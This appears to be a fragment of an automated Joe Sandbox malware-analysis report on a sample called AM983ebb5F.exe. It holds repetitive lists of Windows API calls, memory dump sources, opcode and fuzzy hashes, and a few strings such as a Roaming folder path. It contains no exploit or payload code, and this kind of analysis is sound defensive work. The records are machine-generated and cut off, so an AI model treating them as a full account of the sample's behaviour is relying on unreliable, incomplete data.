                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Open
                                                                                    • String ID:
                                                                                    • API String ID: 71445658-0
                                                                                    • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                    • Instruction ID: e31b8ecfa4924c4a0859a1c58e61cb12282203f41ec30ad4fda9f6d7c72ae418
                                                                                    • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                    • Instruction Fuzzy Hash: 68D0123200020DBBDF115E91ED01FAB3B1DAB08310F014426FE16E5091D776D570A764
                                                                                    APIs
                                                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: bd9eef0ddba76f96e5ede74a4073dc30a0544dd5bf06428a66fa2d1577afb889
                                                                                    • Instruction ID: b7b437a2ec26925c6232407c7e58ab903e49824199ec6a3f71ab3ccdd8f320e3
                                                                                    • Opcode Fuzzy Hash: bd9eef0ddba76f96e5ede74a4073dc30a0544dd5bf06428a66fa2d1577afb889
                                                                                    • Instruction Fuzzy Hash: 81D05B72B08104DBDB01DBE8EA48A9E73B4DB50338B21893BD111F11D0D7B8C545A71D
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                                                                    • Instruction ID: 7d988476d572be30e71f68111afb2513933db934ea5b2002f3fecefde51a3b0c
                                                                                    • Opcode Fuzzy Hash: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                                                                    • Instruction Fuzzy Hash: ACC04C717402007BDA209F50AD49F07775467A0702F1494797341E51E0C674E550D61C
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                                                                    • Instruction ID: 777369a795cbaa9bd4fd16da76cbada5404ff361b75e364c58eeef3f96c31ac9
                                                                                    • Opcode Fuzzy Hash: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                                                                    • Instruction Fuzzy Hash: 6BB09235181600AADA115B40DE09F867BA2E7A4701F029438B340640B0CBB210A0DB08
                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034F8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 973152223-0
                                                                                    • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                    • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                    • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                    • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,004042CF), ref: 00404502
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                                                                    • Instruction ID: 186c68f4495094c0cebc3eb7279f68ffc90812dad8dfd9e689695b78415bb769
                                                                                    • Opcode Fuzzy Hash: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                                                                    • Instruction Fuzzy Hash: 43A00176544A04ABCE12EB50EF4990ABB62BBA4B01B618879A285514388B325921EB19
                                                                                    APIs
                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                      • Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,74DF23A0), ref: 00405637
                                                                                      • Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                      • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, abelsa",?), ref: 00405B63
                                                                                      • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?, abelsa",?), ref: 00405B70
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                                                      • Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
                                                                                      • Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29
                                                                                      • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2972824698-0
                                                                                    • Opcode ID: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
                                                                                    • Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
                                                                                    • Opcode Fuzzy Hash: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
                                                                                    • Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404A16
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404A40
                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404AFC
                                                                                    • lstrcmpiW.KERNEL32(: Completed,0042CA68,00000000,?,?), ref: 00404B2E
                                                                                    • lstrcatW.KERNEL32(?,: Completed), ref: 00404B3A
                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C
                                                                                      • Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE
                                                                                      • Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\AM983ebb5F.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                                      • Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                                      • Part of subcall function 00406805: CharNextW.USER32(?,"C:\Users\user\Desktop\AM983ebb5F.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                                      • Part of subcall function 00406805: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                    • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A
                                                                                      • Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                                      • Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
                                                                                      • Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: : Completed$A$C:\Users\user\AppData\Roaming\erstatningsgraden
                                                                                    • API String ID: 2624150263-2049196090
                                                                                    • Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                    • Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
                                                                                    • Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                    • Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Roaming\erstatningsgraden, xrefs: 0040226E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInstance
                                                                                    • String ID: C:\Users\user\AppData\Roaming\erstatningsgraden
                                                                                    • API String ID: 542301482-1967000036
                                                                                    • Opcode ID: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
                                                                                    • Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
                                                                                    • Opcode Fuzzy Hash: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
                                                                                    • Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFindFirst
                                                                                    • String ID:
                                                                                    • API String ID: 1974802433-0
                                                                                    • Opcode ID: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
                                                                                    • Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
                                                                                    • Opcode Fuzzy Hash: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
                                                                                    • Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                                                    • Instruction ID: a5eb8001d75a17d38d83411349fde439c8a9064fda1b18d7f978e280ae41e255
                                                                                    • Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                                                    • Instruction Fuzzy Hash: ACE19C71A04709DFCB24CF58C880BAABBF1FF45305F15852EE496A72D1E378AA51CB05
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                                                    • Instruction ID: e409ec8ffb443055957628c835c79614664982182129ebc37b3e11cb9bcd83e5
                                                                                    • Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                                                    • Instruction Fuzzy Hash: ECC14772E04219CBCF18CF68C4905EEBBB2BF98354F25866AD85677380D7346942CF95
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404F5B
                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404F66
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
                                                                                    • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
                                                                                    • SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
